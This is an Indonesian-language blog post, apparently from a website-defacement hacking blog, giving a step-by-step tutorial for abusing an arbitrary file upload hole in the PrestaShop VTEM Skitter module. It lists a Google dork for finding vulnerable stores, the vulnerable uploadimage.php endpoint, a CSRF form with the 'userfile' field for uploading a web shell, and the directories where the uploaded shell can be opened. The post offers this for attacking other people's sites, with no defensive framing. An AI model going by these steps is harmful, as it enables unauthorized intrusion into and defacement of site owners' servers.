Deface Prestashop VTEM Skitter Arbitrary File Upload

Hasil gambar untuk prestashop hacking 

Assalamualaikum Wr Wb

hai para hekerman atau pepeserman, oke jumpa lagi sama saya, pada postingan kali ini saya akan memberikan sedikit refrensi untuk kalian, bagaimana cara mengupload file secara sewenang,,,,

oke langsung saja kita siapkan bahan bahannya

1. CSRF =  Touch Me
2. Dork = inurl:/modules/vtemskitter/
                 kembangin lagi pake otak wibu kalian
3. Exploit = /modules/vtemskitter/uploadimage.php
4. Akeses shell = /modules/vtemskitter/img/namashell.php
                            /modules/vtemskitter/slides/namashell.php
5. Berdoa.

Step 1

Kalian Dorking memakai browser kesayangan kalian masing masing
pilih yang menurut anda vuln / rentan.

Step 2

Nah jika sudah kalian klik kanan pada mouse anda dan pilih Copy Image Location / View Image.
sesudah itu kalian Pastekan  ke Url.

jika sudah kalian kasih exploit nya

contoh : https://webshell.com/modules/vtemskitter/uploadimage.php

nah jika VULN akan terlihat bacaan ERROR
seperti gambar di bawah.

Step 3

jika sudah, kalian COPY semua URL nya.
lalu kalian buka CSRF
kalian pastekan url yang sudah kalian copy di TARGET

POST FILE > kalian isi dengan userfile

lalu kalian skskmat atau konci targetnya
jika sudah otomatis akan keluar file upload dan upload shell / sc kalian disana...
jika sukses akan terlihat tulisan

success:namashell.php

kalian akses deh shellnya...
https://webshell.com/modules/vtemskitter/img/namashell.php

atau

https://webshell.com/modules/vtemskitter/slides/namashell.php

dan hasil seperti ini :)

Hasil

cukup sekian refrensi kali ini semoga bermanfaat...
Tutorial Video


Assalamualaikum Wr Wb

See You

0 Comments:

Post a Comment